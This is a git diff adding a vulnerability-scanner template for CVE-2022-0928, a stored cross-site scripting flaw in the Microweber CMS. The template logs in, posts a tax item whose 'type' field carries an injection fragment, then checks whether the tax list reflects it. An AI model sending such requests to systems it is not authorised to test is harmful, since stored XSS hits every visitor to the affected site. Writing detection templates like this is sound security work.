diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml new file mode 100644 index 0000000000..3e8eb94d32 --- /dev/null +++ b/cves/2022/CVE-2022-0928.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-0928 + +info: + name: Microweber - Cross-site Scripting + author: amit-jd + severity: medium + description: | + Cross-site Scripting (XSS) discovered in microweber prior to 1.2.12. Type parameter in the body of POST request triggered by add/edit tax in microweb are vulnerable to stored XSS. + reference: + - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd + - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0928 + classification: + cve-id: CVE-2022-0928 + metadata: + verified: true + tags: cve,cve2022,xss,microweber,cms,authenticated + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /api/shop/save_tax_item HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:settings + + id=0&name=vat1&type=">&rate=10 + + - |- + POST /module HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer:{{BaseURL}}/admin/view:settings + + class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - contains(body_3,'\">') + - 'contains(all_headers_3,"text/html")' + - 'status_code==200' + condition: and